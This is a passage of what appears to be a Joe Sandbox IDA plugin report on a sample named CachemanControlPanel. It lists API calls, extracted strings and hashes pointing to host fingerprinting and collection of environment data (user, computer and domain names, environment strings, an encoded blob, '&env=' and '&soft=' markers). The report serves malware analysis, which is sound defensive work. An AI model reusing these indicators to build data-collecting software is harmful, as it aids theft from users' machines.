                                                        • Instruction Fuzzy Hash: 0C01D431300216BBD7246F50AE4DFEB3768EF41B51F50412EFA05A1190EFA84941D66D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00418710: TlsGetValue.KERNEL32(00000022,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00404AE3,00000000), ref: 00418727
                                                          • Part of subcall function 004117FF: HeapAlloc.KERNEL32(00000000,004338C4,?,00430D24,?,?,?,004010B2,0000000C,00000001,00000007,00430D24,004338DC,00000000,00001000,00000000), ref: 0041182F
                                                          • Part of subcall function 004117FF: memset.MSVCRT ref: 0041186A
                                                          • Part of subcall function 00418570: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 00418576
                                                          • Part of subcall function 00418570: TlsGetValue.KERNEL32(00000022), ref: 00418585
                                                          • Part of subcall function 00418570: SetLastError.KERNEL32(?), ref: 0041859B
                                                          • Part of subcall function 0040A212: TlsGetValue.KERNEL32(00000000,0040111B,0043101C,FFFFFFFF,00000002,00000000,00000000,00000001,00000020,00000000,00000000,0043383C,00000000,00000000,00000000,0000000C), ref: 0040A219
                                                          • Part of subcall function 004172D0: CharLowerW.USER32(00000000,00000000,004338DC,00001000,00001000,?,?,00000000,00408DDA,00000001,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00417321
                                                          • Part of subcall function 004185B0: TlsGetValue.KERNEL32(00000022,00000000,00000000), ref: 004185BC
                                                          • Part of subcall function 004185B0: RtlAllocateHeap.NTDLL(02A80000,00000000,?), ref: 004185E9
                                                          • Part of subcall function 00408BB3: GetModuleFileNameW.KERNEL32(00000000,00000000,00000400,00000000,00000400,00000000,00000000,00001000,00000000,004012EF,00000001,00000000,00433874,\ref.conf,02A804F8,00000000), ref: 00408BF6
                                                          • Part of subcall function 00418640: wcslen.MSVCRT ref: 00418657
                                                          • Part of subcall function 004185B0: HeapReAlloc.KERNEL32(02A80000,00000000,?,?), ref: 0041860C
                                                          • Part of subcall function 00407270: PathFileExistsW.SHLWAPI(00000000,00408E1B,00000000,00000000,id.conf,00000001,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00407284
                                                          • Part of subcall function 0040C5A6: GetComputerNameW.KERNEL32(00000000,00000000), ref: 0040C5BF
                                                          • Part of subcall function 0040C5E3: GetUserNameW.ADVAPI32(00000000,00000000), ref: 0040C5FE
                                                          • Part of subcall function 0040C627: _mbscpy.MSVCRT ref: 0040C639
                                                          • Part of subcall function 00405B39: GetDiskFreeSpaceExW.KERNEL32(HOMEDRIVE,00000000,00000000,?,?,00000000,00000000), ref: 00405BA3
                                                          • Part of subcall function 004061FB: IsUserAdmin.SETUPAPI ref: 00406209
                                                          • Part of subcall function 00407868: GetSystemPowerStatus.KERNEL32(00000000), ref: 00407884
                                                          • Part of subcall function 0040AB16: GetEnvironmentVariableW.KERNEL32(004338DC,00000000,00000000,?,?,00401215,00000000,00000000,0043387C,installation,name,00000000,0043389C,installation,subfolder,00000000), ref: 0040AB20
                                                          • Part of subcall function 0040AB16: GetEnvironmentVariableW.KERNEL32(004338DC,00000000,00000001,00000000,00000000,?,?,00401215,00000000,00000000,0043387C,installation,name,00000000,0043389C,installation), ref: 0040AB42
                                                          • Part of subcall function 00403F5D: GetSystemMetrics.USER32(00000000), ref: 00403F84
                                                          • Part of subcall function 00403F5D: GetSystemMetrics.USER32(00000001), ref: 00403FB0
                                                        • GetCurrentProcessId.KERNEL32(00001050,00000000,0000104C,00000000,00001048,00000000,00000000,00001044,00000000,00000000,00001040,00000000,00000000,0000103C,02A804A0,00000000), ref: 00409065
                                                          • Part of subcall function 004169D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00407D6F,00000000,00000000,00000000,00000000), ref: 004169F2
                                                          • Part of subcall function 004169D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00407D6F,00000000,00000000,00000000), ref: 00416A16
                                                          • Part of subcall function 004187A0: HeapFree.KERNEL32(02A80000,00000000,00000000,?,00000000,?,0041FFFD,00000000,00000000,00000000), ref: 004187B8
                                                          • Part of subcall function 00411A76: HeapFree.KERNEL32(00000000,-00000018,00430D24,00000000,00411810,00430D24,?,?,?,004010B2,0000000C,00000001,00000007,00430D24,004338DC,00000000), ref: 00411AB7
                                                        Strings
                                                        • AZERIA, xrefs: 00408E9A
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 00408D2B
                                                        • USERDOMAIN, xrefs: 00408F8F, 00408F94
                                                        • \ID.txt, xrefs: 004090D8, 004090DD
                                                        • APPDATA, xrefs: 004090CD, 004090D2
                                                        • id.conf, xrefs: 00408DF7, 00408DFC
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Heap$Value$CharFreeNameSystem$AllocByteEnvironmentErrorFileLastMetricsMultiUserVariableWide$AdminAllocateComputerCurrentDiskExistsLowerModulePathPowerProcessSpaceStatus_mbscpymemsetwcslen
                                                        • String ID: APPDATA$AZERIA$Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY$USERDOMAIN$\ID.txt$id.conf
                                                        • API String ID: 932627432-3283602350
                                                        • Opcode ID: 655f3cb89067b2944fbe51a659b85dc0b26e5eb61c111174d6c3259188e8b2ae
                                                        • Instruction ID: 17a0492749ee171e7570c13b29198b5cb4f486783486d0b6bc8872483b9ccc98
                                                        • Opcode Fuzzy Hash: 655f3cb89067b2944fbe51a659b85dc0b26e5eb61c111174d6c3259188e8b2ae
                                                        • Instruction Fuzzy Hash: 3CA1CBB9900204BADA00BBB29D86DFF37AEDFC4718B50C82FB50496152ED3CDAC5566D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetObjectType.GDI32(?), ref: 00412DE9
                                                        • GetObjectW.GDI32(?,00000054,?), ref: 00412E05
                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00412E1F
                                                        • HeapFree.KERNEL32(00000000,00000000,?,?), ref: 00412E84
                                                        • HeapFree.KERNEL32(00000000,00000000,?,?), ref: 00412EA8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Object$FreeHeap$Type
                                                        • String ID: $
                                                        • API String ID: 1123114911-227171996
                                                        • Opcode ID: b310897a81aec26b74e9ef2ab5141737f45265cb2f9cde3872b3f0464e62496e
                                                        • Instruction ID: 31a28a84187b9297c609bb5d7ab21936ab0a9af418b51e63587c0e63e4057229
                                                        • Opcode Fuzzy Hash: b310897a81aec26b74e9ef2ab5141737f45265cb2f9cde3872b3f0464e62496e
                                                        • Instruction Fuzzy Hash: 8021A131A4031AABDB249B50DE41BFF73B8EB44755F104036E941E6290D7F85DE2CBA9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetObjectW.GDI32(?,00000018), ref: 00412D03
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00412D2E
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?), ref: 00412D5A
                                                        • GetDIBits.GDI32(00000000), ref: 00412DA2
                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 00412DB4
                                                        • DeleteDC.GDI32(00000000), ref: 00412DBD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocBitsCompatibleCreateDeleteFreeObject
                                                        • String ID: (
                                                        • API String ID: 3437057831-3887548279
                                                        • Opcode ID: 546e06f3618acfc45a8370284466942fc26102c2756b7937810e763e4a49db85
                                                        • Instruction ID: af44a6d8d879b6cdd7ce86dce192f1e8102c130d652fe3dba5794174a50b480e
                                                        • Opcode Fuzzy Hash: 546e06f3618acfc45a8370284466942fc26102c2756b7937810e763e4a49db85
                                                        • Instruction Fuzzy Hash: C62175B1108300AFD3119F55ED8496BBBE8FF89755F00192EF980D2220DBB5CC548BAA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • TlsAlloc.KERNEL32(?,?,?,?,00416161,00000078,00000000,00416140,?,0040105D,00000000,00001000,00000000,00000000), ref: 00417CF3
                                                        • HeapAlloc.KERNEL32(00000008,00000000,?,?,?,?,00416161,00000078,00000000,00416140,?,0040105D,00000000,00001000,00000000,00000000), ref: 00417D07
                                                        • TlsSetValue.KERNEL32(00000000,?,?,?,?,00416161,00000078,00000000,00416140,?,0040105D,00000000,00001000,00000000,00000000), ref: 00417D14
                                                        • TlsGetValue.KERNEL32(000000DC,?,?,?,?,00416161,00000078,00000000,00416140,?,0040105D,00000000,00001000,00000000,00000000), ref: 00417D2B
                                                        • HeapReAlloc.KERNEL32(00000008,00000000,?,?,?,?,00416161,00000078,00000000,00416140,?,0040105D,00000000,00001000,00000000,00000000), ref: 00417D3A
                                                        • TlsSetValue.KERNEL32(00000000,?,?,?,?,00416161,00000078,00000000,00416140,?,0040105D,00000000,00001000,00000000,00000000), ref: 00417D49
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: AllocValue$Heap
                                                        • String ID: @aA
                                                        • API String ID: 2472784365-4075192114
                                                        • Opcode ID: a60e3111ce40df6b38e8e859a7ba1e0c2d19757b058c76926b9e05abd4dd1c0a
                                                        • Instruction ID: 67471e2488e3b8108ce889357509af6361c6e1ab8197f1249617cf0410779e1a
                                                        • Opcode Fuzzy Hash: a60e3111ce40df6b38e8e859a7ba1e0c2d19757b058c76926b9e05abd4dd1c0a
                                                        • Instruction Fuzzy Hash: C9119332604710AFDB14AF65FC48AA67BF8EB5C762B05513AF940C3370C775AC808BA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00417C63: TlsGetValue.KERNEL32(?,0040B326,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,004057C5,00001000,00000000,00000000,00404EE2,00000000,00000000,00000000,&env=,00000000,00000000), ref: 00417C6A
                                                          • Part of subcall function 00417C63: HeapAlloc.KERNEL32(00000008,00000000,?,0040B326,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,004057C5,00001000,00000000,00000000,00404EE2,00000000,00000000,00000000,&env=), ref: 00417C85
                                                          • Part of subcall function 00417C63: TlsSetValue.KERNEL32(00000000,?,0040B326,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,004057C5,00001000,00000000,00000000,00404EE2,00000000,00000000,00000000,&env=,00000000), ref: 00417C94
                                                        • HeapFree.KERNEL32(00000000,?,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,004057C5,00001000,00000000,00000000,00404EE2,00000000,00000000,00000000,&env=,00000000,00000000), ref: 0040B337
                                                        • GetEnvironmentStringsW.KERNEL32(?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,004057C5,00001000,00000000,00000000,00404EE2,00000000,00000000,00000000,&env=,00000000,00000000,00000000,&soft=), ref: 0040B340
                                                        • wcslen.MSVCRT ref: 0040B355
                                                        • HeapAlloc.KERNEL32(00000000,-00000002,00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,004057C5,00001000,00000000,00000000,00404EE2,00000000,00000000,00000000,&env=,00000000), ref: 0040B373
                                                        • memcpy.MSVCRT ref: 0040B383
                                                        • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,004057C5,00001000,00000000,00000000,00404EE2,00000000,00000000,00000000,&env=,00000000,00000000,00000000), ref: 0040B392
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 0040B316
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocEnvironmentFreeStringsValue$memcpywcslen
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 465591631-3176450862
                                                        • Opcode ID: fdeb6fef8dd0efbccbd19207ff281280781a5d9d39aafe8725714ceadcad9b13
                                                        • Instruction ID: ae288f45fb4fba18520dc57ce6be21278d91371cb65e009a3ff3823c60110092
                                                        • Opcode Fuzzy Hash: fdeb6fef8dd0efbccbd19207ff281280781a5d9d39aafe8725714ceadcad9b13
                                                        • Instruction Fuzzy Hash: D9017531500224BBCB257F65ECC899B7FB8EF447D5315813AFC0996260D775895186D8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: ceil$floormalloc$fabs
                                                        • String ID:
                                                        • API String ID: 2390561812-0
                                                        • Opcode ID: 600848e19833fdb915ac058d955d94c3d4f2e002ddfe75e3aea5d33201af125e
                                                        • Instruction ID: f3fcaec0a881847267bfc4b5c8ec98a1515fd05fd920d2e7bf2c0f979cf6f0e1
                                                        • Opcode Fuzzy Hash: 600848e19833fdb915ac058d955d94c3d4f2e002ddfe75e3aea5d33201af125e
                                                        • Instruction Fuzzy Hash: F181BEB2A08701DBC301BF15D54455ABBF4FF84390F610D9EF5C1A22A1EB76D8A49B8B
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 0040B864
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: strstr$strlen$_strnicmp
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 1937589361-3176450862
                                                        • Opcode ID: 76b1045469e0245dff2553b007267e0819efdbaee095344e88c804c9375a3c19
                                                        • Instruction ID: 5cbda4975f95f48ba78014d50b48f52ba4ae89f0bce569994b3d9789deff4d44
                                                        • Opcode Fuzzy Hash: 76b1045469e0245dff2553b007267e0819efdbaee095344e88c804c9375a3c19
                                                        • Instruction Fuzzy Hash: B311E7736087166BE2262E655C8192BB7D8EB91754F25043FF980723D1FB3D8C02539E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
